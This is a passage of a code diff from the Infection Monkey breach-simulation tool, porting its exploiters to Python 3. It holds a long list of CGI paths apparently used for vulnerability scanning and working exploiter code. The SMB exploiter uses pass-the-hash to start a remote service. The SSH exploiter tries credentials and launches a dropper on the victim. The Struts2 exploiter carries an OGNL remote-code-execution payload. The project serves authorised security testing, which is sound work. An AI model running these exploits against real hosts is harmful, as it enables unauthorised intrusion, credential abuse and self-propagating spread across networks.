r'/cgi-bin/smartsearch/smartsearch.cgi', r'/cgi-bin/smartsearch.cgi',
r'/cgi-bin/snorkerz.bat', r'/cgi-bin/smartsearch/smartsearch.cgi',
r'/cgi-bin/snorkerz.bat', r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.cmd', r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.cmd', r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/sojourn.cgi', r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/spin_client.cgi', r'/cgi-bin/sojourn.cgi',
r'/cgi-bin/start.cgi', r'/cgi-bin/spin_client.cgi',
r'/cgi-bin/status', r'/cgi-bin/start.cgi',
r'/cgi-bin/status_cgi', r'/cgi-bin/status',
r'/cgi-bin/store/agora.cgi', r'/cgi-bin/status_cgi',
r'/cgi-bin/store.cgi', r'/cgi-bin/store/agora.cgi',
r'/cgi-bin/store/index.cgi', r'/cgi-bin/store.cgi',
r'/cgi-bin/survey.cgi', r'/cgi-bin/store/index.cgi',
r'/cgi-bin/sync.cgi', r'/cgi-bin/survey.cgi',
r'/cgi-bin/talkback.cgi', r'/cgi-bin/sync.cgi',
r'/cgi-bin/technote/main.cgi', r'/cgi-bin/talkback.cgi',
r'/cgi-bin/test2.pl', r'/cgi-bin/technote/main.cgi',
r'/cgi-bin/test-cgi', r'/cgi-bin/test2.pl',
r'/cgi-bin/test.cgi', r'/cgi-bin/test-cgi',
r'/cgi-bin/testing_whatever', r'/cgi-bin/test.cgi',
r'/cgi-bin/test/test.cgi', r'/cgi-bin/testing_whatever',
r'/cgi-bin/tidfinder.cgi', r'/cgi-bin/test/test.cgi',
r'/cgi-bin/tigvote.cgi', r'/cgi-bin/tidfinder.cgi',
r'/cgi-bin/title.cgi', r'/cgi-bin/tigvote.cgi',
r'/cgi-bin/top.cgi', r'/cgi-bin/title.cgi',
r'/cgi-bin/traffic.cgi', r'/cgi-bin/top.cgi',
r'/cgi-bin/troops.cgi', r'/cgi-bin/traffic.cgi',
r'/cgi-bin/ttawebtop.cgi/', r'/cgi-bin/troops.cgi',
r'/cgi-bin/ultraboard.cgi', r'/cgi-bin/ttawebtop.cgi/',
r'/cgi-bin/upload.cgi', r'/cgi-bin/ultraboard.cgi',
r'/cgi-bin/urlcount.cgi', r'/cgi-bin/upload.cgi',
r'/cgi-bin/viewcvs.cgi', r'/cgi-bin/urlcount.cgi',
r'/cgi-bin/view_help.cgi', r'/cgi-bin/viewcvs.cgi',
r'/cgi-bin/viralator.cgi', r'/cgi-bin/view_help.cgi',
r'/cgi-bin/virgil.cgi', r'/cgi-bin/viralator.cgi',
r'/cgi-bin/vote.cgi', r'/cgi-bin/virgil.cgi',
r'/cgi-bin/vpasswd.cgi', r'/cgi-bin/vote.cgi',
r'/cgi-bin/way-board.cgi', r'/cgi-bin/vpasswd.cgi',
r'/cgi-bin/way-board/way-board.cgi', r'/cgi-bin/way-board.cgi',
r'/cgi-bin/webbbs.cgi', r'/cgi-bin/way-board/way-board.cgi',
r'/cgi-bin/webcart/webcart.cgi', r'/cgi-bin/webbbs.cgi',
r'/cgi-bin/webdist.cgi', r'/cgi-bin/webcart/webcart.cgi',
r'/cgi-bin/webif.cgi', r'/cgi-bin/webdist.cgi',
r'/cgi-bin/webmail/html/emumail.cgi', r'/cgi-bin/webif.cgi',
r'/cgi-bin/webmap.cgi', r'/cgi-bin/webmail/html/emumail.cgi',
r'/cgi-bin/webspirs.cgi', r'/cgi-bin/webmap.cgi',
r'/cgi-bin/Web_Store/web_store.cgi', r'/cgi-bin/webspirs.cgi',
r'/cgi-bin/whois.cgi', r'/cgi-bin/Web_Store/web_store.cgi',
r'/cgi-bin/whois_raw.cgi', r'/cgi-bin/whois.cgi',
r'/cgi-bin/whois/whois.cgi', r'/cgi-bin/whois_raw.cgi',
r'/cgi-bin/wrap', r'/cgi-bin/whois/whois.cgi',
r'/cgi-bin/wrap.cgi', r'/cgi-bin/wrap',
r'/cgi-bin/wwwboard.cgi.cgi', r'/cgi-bin/wrap.cgi',
r'/cgi-bin/YaBB/YaBB.cgi', r'/cgi-bin/wwwboard.cgi.cgi',
r'/cgi-bin/zml.cgi', r'/cgi-bin/YaBB/YaBB.cgi',
r'/cgi-mod/index.cgi', r'/cgi-bin/zml.cgi',
r'/cgis/wwwboard/wwwboard.cgi', r'/cgi-mod/index.cgi',
r'/cgi-sys/addalink.cgi', r'/cgis/wwwboard/wwwboard.cgi',
r'/cgi-sys/defaultwebpage.cgi', r'/cgi-sys/addalink.cgi',
r'/cgi-sys/domainredirect.cgi', r'/cgi-sys/defaultwebpage.cgi',
r'/cgi-sys/entropybanner.cgi', r'/cgi-sys/domainredirect.cgi',
r'/cgi-sys/entropysearch.cgi', r'/cgi-sys/entropybanner.cgi',
r'/cgi-sys/FormMail-clone.cgi', r'/cgi-sys/entropysearch.cgi',
r'/cgi-sys/helpdesk.cgi', r'/cgi-sys/FormMail-clone.cgi',
r'/cgi-sys/mchat.cgi', r'/cgi-sys/helpdesk.cgi',
r'/cgi-sys/randhtml.cgi', r'/cgi-sys/mchat.cgi',
r'/cgi-sys/realhelpdesk.cgi', r'/cgi-sys/randhtml.cgi',
r'/cgi-sys/realsignup.cgi', r'/cgi-sys/realhelpdesk.cgi',
r'/cgi-sys/signup.cgi', r'/cgi-sys/realsignup.cgi',
r'/connector.cgi', r'/cgi-sys/signup.cgi',
r'/cp/rac/nsManager.cgi', r'/connector.cgi',
r'/create_release.sh', r'/cp/rac/nsManager.cgi',
r'/CSNews.cgi', r'/create_release.sh',
r'/csPassword.cgi', r'/CSNews.cgi',
r'/dcadmin.cgi', r'/csPassword.cgi',
r'/dcboard.cgi', r'/dcadmin.cgi',
r'/dcforum.cgi', r'/dcboard.cgi',
r'/dcforum/dcforum.cgi', r'/dcforum.cgi',
r'/debuff.cgi', r'/dcforum/dcforum.cgi',
r'/debug.cgi', r'/debuff.cgi',
r'/details.cgi', r'/debug.cgi',
r'/edittag/edittag.cgi', r'/details.cgi',
r'/emumail.cgi', r'/edittag/edittag.cgi',
r'/enter_buff.cgi', r'/emumail.cgi',
r'/enter_bug.cgi', r'/enter_buff.cgi',
r'/ez2000/ezadmin.cgi', r'/enter_bug.cgi',
r'/ez2000/ezboard.cgi', r'/ez2000/ezadmin.cgi',
r'/ez2000/ezman.cgi', r'/ez2000/ezboard.cgi',
r'/fcgi-bin/echo', r'/ez2000/ezman.cgi',
r'/fcgi-bin/echo', r'/fcgi-bin/echo',
r'/fcgi-bin/echo2', r'/fcgi-bin/echo',
r'/fcgi-bin/echo2', r'/fcgi-bin/echo2',
r'/Gozila.cgi', r'/fcgi-bin/echo2',
r'/hitmatic/analyse.cgi', r'/Gozila.cgi',
r'/hp_docs/cgi-bin/index.cgi', r'/hitmatic/analyse.cgi',
r'/html/cgi-bin/cgicso', r'/hp_docs/cgi-bin/index.cgi',
r'/html/cgi-bin/cgicso', r'/html/cgi-bin/cgicso',
r'/index.cgi', r'/html/cgi-bin/cgicso',
r'/info.cgi', r'/index.cgi',
r'/infosrch.cgi', r'/info.cgi',
r'/login.cgi', r'/infosrch.cgi',
r'/mailview.cgi', r'/login.cgi',
r'/main.cgi', r'/mailview.cgi',
r'/megabook/admin.cgi', r'/main.cgi',
r'/ministats/admin.cgi', r'/megabook/admin.cgi',
r'/mods/apage/apage.cgi', r'/ministats/admin.cgi',
r'/_mt/mt.cgi', r'/mods/apage/apage.cgi',
r'/musicqueue.cgi', r'/_mt/mt.cgi',
r'/ncbook.cgi', r'/musicqueue.cgi',
r'/newpro.cgi', r'/ncbook.cgi',
r'/newsletter.sh', r'/newpro.cgi',
r'/oem_webstage/cgi-bin/oemapp_cgi', r'/newsletter.sh',
r'/page.cgi', r'/oem_webstage/cgi-bin/oemapp_cgi',
r'/parse_xml.cgi', r'/page.cgi',
r'/photodata/manage.cgi', r'/parse_xml.cgi',
r'/photo/manage.cgi', r'/photodata/manage.cgi',
r'/print.cgi', r'/photo/manage.cgi',
r'/process_buff.cgi', r'/print.cgi',
r'/process_bug.cgi', r'/process_buff.cgi',
r'/pub/english.cgi', r'/process_bug.cgi',
r'/quikmail/nph-emumail.cgi', r'/pub/english.cgi',
r'/quikstore.cgi', r'/quikmail/nph-emumail.cgi',
r'/reviews/newpro.cgi', r'/quikstore.cgi',
r'/ROADS/cgi-bin/search.pl', r'/reviews/newpro.cgi',
r'/sample01.cgi', r'/ROADS/cgi-bin/search.pl',
r'/sample02.cgi', r'/sample01.cgi',
r'/sample03.cgi', r'/sample02.cgi',
r'/sample04.cgi', r'/sample03.cgi',
r'/sampleposteddata.cgi', r'/sample04.cgi',
r'/scancfg.cgi', r'/sampleposteddata.cgi',
r'/scancfg.cgi', r'/scancfg.cgi',
r'/servers/link.cgi', r'/scancfg.cgi',
r'/setpasswd.cgi', r'/servers/link.cgi',
r'/SetSecurity.shm', r'/setpasswd.cgi',
r'/shop/member_html.cgi', r'/SetSecurity.shm',
r'/shop/normal_html.cgi', r'/shop/member_html.cgi',
r'/site_searcher.cgi', r'/shop/normal_html.cgi',
r'/siteUserMod.cgi', r'/site_searcher.cgi',
r'/submit.cgi', r'/siteUserMod.cgi',
r'/technote/print.cgi', r'/submit.cgi',
r'/template.cgi', r'/technote/print.cgi',
r'/test.cgi', r'/template.cgi',
r'/ucsm/isSamInstalled.cgi', r'/test.cgi',
r'/upload.cgi', r'/ucsm/isSamInstalled.cgi',
r'/userreg.cgi', r'/upload.cgi',
r'/users/scripts/submit.cgi', r'/userreg.cgi',
r'/vood/cgi-bin/vood_view.cgi', r'/users/scripts/submit.cgi',
r'/Web_Store/web_store.cgi', r'/vood/cgi-bin/vood_view.cgi',
r'/webtools/bonsai/ccvsblame.cgi', r'/Web_Store/web_store.cgi',
r'/webtools/bonsai/cvsblame.cgi', r'/webtools/bonsai/ccvsblame.cgi',
r'/webtools/bonsai/cvslog.cgi', r'/webtools/bonsai/cvsblame.cgi',
r'/webtools/bonsai/cvsquery.cgi', r'/webtools/bonsai/cvslog.cgi',
r'/webtools/bonsai/cvsqueryform.cgi', r'/webtools/bonsai/cvsquery.cgi',
r'/webtools/bonsai/showcheckins.cgi', r'/webtools/bonsai/cvsqueryform.cgi',
r'/wwwadmin.cgi', r'/webtools/bonsai/showcheckins.cgi',
r'/wwwboard.cgi', r'/wwwadmin.cgi',
r'/wwwboard/wwwboard.cgi') r'/wwwboard.cgi',
r'/wwwboard/wwwboard.cgi'
)

View File

@ -3,11 +3,11 @@ from logging import getLogger
from impacket.dcerpc.v5 import transport, scmr from impacket.dcerpc.v5 import transport, scmr
from impacket.smbconnection import SMB_DIALECT from impacket.smbconnection import SMB_DIALECT
from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS
from infection_monkey.network import SMBFinger from infection_monkey.network.smbfinger import SMBFinger
from infection_monkey.network.tools import check_tcp_port from infection_monkey.network.tools import check_tcp_port
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
from infection_monkey.telemetry.attack.t1035_telem import T1035Telem from infection_monkey.telemetry.attack.t1035_telem import T1035Telem
@ -108,16 +108,15 @@ class SmbExploiter(HostExploiter):
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \ cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1) build_monkey_commandline(self.host, get_monkey_depth() - 1)
smb_conn = False
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,)) rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
rpctransport.set_dport(port) rpctransport.set_dport(port)
if hasattr(rpctransport, 'preferred_dialect'): if hasattr(rpctransport, 'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT) rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'): if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences. # This method exists only for selected protocol sequences.
rpctransport.set_credentials(user, password, '', rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
lm_hash, ntlm_hash, None)
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS) rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)
scmr_rpc = rpctransport.get_dce_rpc() scmr_rpc = rpctransport.get_dce_rpc()
@ -125,13 +124,14 @@ class SmbExploiter(HostExploiter):
try: try:
scmr_rpc.connect() scmr_rpc.connect()
except Exception as exc: except Exception as exc:
LOG.warn("Error connecting to SCM on exploited machine %r: %s", LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc)
self.host, exc) continue
return False
smb_conn = rpctransport.get_smb_connection() smb_conn = rpctransport.get_smb_connection()
break break
if not smb_conn:
return False
# We don't wanna deal with timeouts from now on. # We don't wanna deal with timeouts from now on.
smb_conn.setTimeout(100000) smb_conn.setTimeout(100000)
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR) scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)

View File

@ -1,16 +1,15 @@
import StringIO import io
import logging import logging
import time import time
import paramiko import paramiko
import infection_monkey.monkeyfs as monkeyfs import infection_monkey.monkeyfs as monkeyfs
from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
from infection_monkey.exploit.tools.helpers import get_interface_to_target
from infection_monkey.model import MONKEY_ARG from infection_monkey.model import MONKEY_ARG
from infection_monkey.network.tools import check_tcp_port from infection_monkey.network.tools import check_tcp_port, get_interface_to_target
from infection_monkey.exploit.tools.exceptions import FailedExploitationError
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
from common.utils.attack_utils import ScanStatus from common.utils.attack_utils import ScanStatus
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
@ -38,15 +37,16 @@ class SSHExploiter(HostExploiter):
LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total) LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
self._update_timestamp = time.time() self._update_timestamp = time.time()
def exploit_with_ssh_keys(self, port, ssh): def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs() user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
exploited = False
for user, ssh_key_pair in user_ssh_key_pairs: for user, ssh_key_pair in user_ssh_key_pairs:
# Creating file-like private key for paramiko # Creating file-like private key for paramiko
pkey = StringIO.StringIO(ssh_key_pair['private_key']) pkey = io.StringIO(ssh_key_pair['private_key'])
ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip']) ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
try: try:
pkey = paramiko.RSAKey.from_private_key(pkey) pkey = paramiko.RSAKey.from_private_key(pkey)
except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException): except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
@ -55,56 +55,53 @@ class SSHExploiter(HostExploiter):
ssh.connect(self.host.ip_addr, ssh.connect(self.host.ip_addr,
username=user, username=user,
pkey=pkey, pkey=pkey,
port=port, port=port)
timeout=None)
LOG.debug("Successfully logged in %s using %s users private key", LOG.debug("Successfully logged in %s using %s users private key",
self.host, ssh_string) self.host, ssh_string)
exploited = True
self.report_login_attempt(True, user, ssh_key=ssh_string) self.report_login_attempt(True, user, ssh_key=ssh_string)
break return ssh
except Exception as exc: except Exception:
ssh.close()
LOG.debug("Error logging into victim %r with %s" LOG.debug("Error logging into victim %r with %s"
" private key", self.host, " private key", self.host,
ssh_string) ssh_string)
self.report_login_attempt(False, user, ssh_key=ssh_string) self.report_login_attempt(False, user, ssh_key=ssh_string)
continue continue
return exploited raise FailedExploitationError
def exploit_with_login_creds(self, port, ssh): def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
user_password_pairs = self._config.get_exploit_user_password_pairs() user_password_pairs = self._config.get_exploit_user_password_pairs()
exploited = False
for user, current_password in user_password_pairs: for user, current_password in user_password_pairs:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
try: try:
ssh.connect(self.host.ip_addr, ssh.connect(self.host.ip_addr,
username=user, username=user,
password=current_password, password=current_password,
port=port, port=port)
timeout=None)
LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)", LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
self.host, user, self._config.hash_sensitive_data(current_password)) self.host, user, self._config.hash_sensitive_data(current_password))
exploited = True
self.add_vuln_port(port) self.add_vuln_port(port)
self.report_login_attempt(True, user, current_password) self.report_login_attempt(True, user, current_password)
break return ssh
except Exception as exc: except Exception as exc:
LOG.debug("Error logging into victim %r with user" LOG.debug("Error logging into victim %r with user"
" %s and password (SHA-512) '%s': (%s)", self.host, " %s and password (SHA-512) '%s': (%s)", self.host,
user, self._config.hash_sensitive_data(current_password), exc) user, self._config.hash_sensitive_data(current_password), exc)
self.report_login_attempt(False, user, current_password) self.report_login_attempt(False, user, current_password)
ssh.close()
continue continue
return exploited raise FailedExploitationError
def _exploit_host(self): def _exploit_host(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT port = SSH_PORT
# if ssh banner found on different port, use that port. # if ssh banner found on different port, use that port.
for servkey, servdata in self.host.services.items(): for servkey, servdata in list(self.host.services.items()):
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'): if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-', '')) port = int(servkey.replace('tcp-', ''))
@ -113,19 +110,19 @@ class SSHExploiter(HostExploiter):
LOG.info("SSH port is closed on %r, skipping", self.host) LOG.info("SSH port is closed on %r, skipping", self.host)
return False return False
# Check for possible ssh exploits try:
exploited = self.exploit_with_ssh_keys(port, ssh) ssh = self.exploit_with_ssh_keys(port)
if not exploited: except FailedExploitationError:
exploited = self.exploit_with_login_creds(port, ssh) try:
ssh = self.exploit_with_login_creds(port)
if not exploited: except FailedExploitationError:
LOG.debug("Exploiter SSHExploiter is giving up...") LOG.debug("Exploiter SSHExploiter is giving up...")
return False return False
if not self.host.os.get('type'): if not self.host.os.get('type'):
try: try:
_, stdout, _ = ssh.exec_command('uname -o') _, stdout, _ = ssh.exec_command('uname -o')
uname_os = stdout.read().lower().strip() uname_os = stdout.read().lower().strip().decode()
if 'linux' in uname_os: if 'linux' in uname_os:
self.host.os['type'] = 'linux' self.host.os['type'] = 'linux'
else: else:
@ -138,7 +135,7 @@ class SSHExploiter(HostExploiter):
if not self.host.os.get('machine'): if not self.host.os.get('machine'):
try: try:
_, stdout, _ = ssh.exec_command('uname -m') _, stdout, _ = ssh.exec_command('uname -m')
uname_machine = stdout.read().lower().strip() uname_machine = stdout.read().lower().strip().decode()
if '' != uname_machine: if '' != uname_machine:
self.host.os['machine'] = uname_machine self.host.os['machine'] = uname_machine
except Exception as exc: except Exception as exc:
@ -183,7 +180,7 @@ class SSHExploiter(HostExploiter):
try: try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
cmdline += "&" cmdline += " > /dev/null 2>&1 &"
ssh.exec_command(cmdline) ssh.exec_command(cmdline)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",

View File

@ -3,13 +3,14 @@
code used is from https://www.exploit-db.com/exploits/41570/ code used is from https://www.exploit-db.com/exploits/41570/
Vulnerable struts2 versions <=2.3.31 and <=2.5.10 Vulnerable struts2 versions <=2.3.31 and <=2.5.10
""" """
import urllib2 import http.client
import httplib import logging
import unicodedata
import re import re
import ssl import ssl
import urllib.error
import urllib.parse
import urllib.request
import logging
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
__author__ = "VakarisZ" __author__ = "VakarisZ"
@ -47,10 +48,10 @@ class Struts2Exploiter(WebRCE):
def get_redirected(url): def get_redirected(url):
# Returns false if url is not right # Returns false if url is not right
headers = {'User-Agent': 'Mozilla/5.0'} headers = {'User-Agent': 'Mozilla/5.0'}
request = urllib2.Request(url, headers=headers) request = urllib.request.Request(url, headers=headers)
try: try:
return urllib2.urlopen(request, context=ssl._create_unverified_context()).geturl() return urllib.request.urlopen(request, context=ssl._create_unverified_context()).geturl()
except urllib2.URLError: except urllib.error.URLError:
LOG.error("Can't reach struts2 server") LOG.error("Can't reach struts2 server")
return False return False
@ -79,18 +80,15 @@ class Struts2Exploiter(WebRCE):
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \ "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
"(#ros.flush())}" % cmd "(#ros.flush())}" % cmd
# Turns payload ascii just for consistency
if isinstance(payload, unicode):
payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
try: try:
request = urllib2.Request(url, headers=headers) request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output # Timeout added or else we would wait for all monkeys' output
page = urllib2.urlopen(request).read() page = urllib.request.urlopen(request).read()
except AttributeError: except AttributeError:
# If url does not exist # If url does not exist
return False return False
except httplib.IncompleteRead as e: except http.client.IncompleteRead as e:
page = e.partial page = e.partial.decode()
return page return page

Some files were not shown because too many files have changed in this diff Show More